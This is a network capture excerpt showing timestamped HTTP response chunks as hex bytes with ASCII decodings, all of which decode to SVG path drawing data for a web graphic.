                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2526INData Raw: 2c 31 38 30 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 32 36 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35
                                                                                                                                                                                                                                                                                                      Data Ascii: ,180a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M951.26,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2542INData Raw: 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 34 33 2c 31 32 36 2e 32 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M921.43,126.29a1.7,1.7,0,0,1,.77-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2558INData Raw: 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 32 34 2c 32 36 33 2e 35 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                                                      Data Ascii: 2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.24,263.56a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><pa
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2574INData Raw: 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 34 31 2c 32 30 33 2e 30 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: ass="cls-4" d="M875.41,203.05a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2590INData Raw: 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 35 2e 38 32 2c 31 34 39 2e 33 36 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36
                                                                                                                                                                                                                                                                                                      Data Ascii: .36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M845.82,149.36a1.68,1.68,0,0,1,.76-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2606INData Raw: 32 37 39 2e 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 36 33 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38
                                                                                                                                                                                                                                                                                                      Data Ascii: 279.8a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.63,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2622INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 39 2e 38 2c 32 32 36 2e 31 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 0,0,1-.16-2.81"/><path class="cls-4" d="M799.8,226.11a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2638INData Raw: 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2e 32 35 2c 32 33 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: ,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505.25,237a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2654INData Raw: 30 37 2c 39 37 2e 32 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 07,97.27a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2670INData Raw: 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 37 38 2c 31 36 35 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: ,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M557.78,165.66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2686INData Raw: 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 37 35 2c 32 34 31 2e 37 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: ,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M591.75,241.76a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path cl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2703INData Raw: 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 35 37 2c 31 30 32 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39
                                                                                                                                                                                                                                                                                                      Data Ascii: -3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M610.57,102.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.9
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:56 UTC2719INData Raw: 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 35 34 2c 31 37 38 2e 31 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: 7,0,0,1,.18,3.18"/><path class="cls-7" d="M644.54,178.17a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2787INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 35 31 2c 32 35 34 2e 32 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36
                                                                                                                                                                                                                                                                                                      Data Ascii: ath class="cls-7" d="M678.51,254.28a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2803INData Raw: 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 37 2e 30 37 2c 31 30 36 2e 38 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32
                                                                                                                                                                                                                                                                                                      Data Ascii: ,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M697.07,106.87a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2819INData Raw: 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 31 2c 31 38 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64
                                                                                                                                                                                                                                                                                                      Data Ascii: -1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M731,183a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC2835INData Raw: 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 35 2c 32 35 39 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39
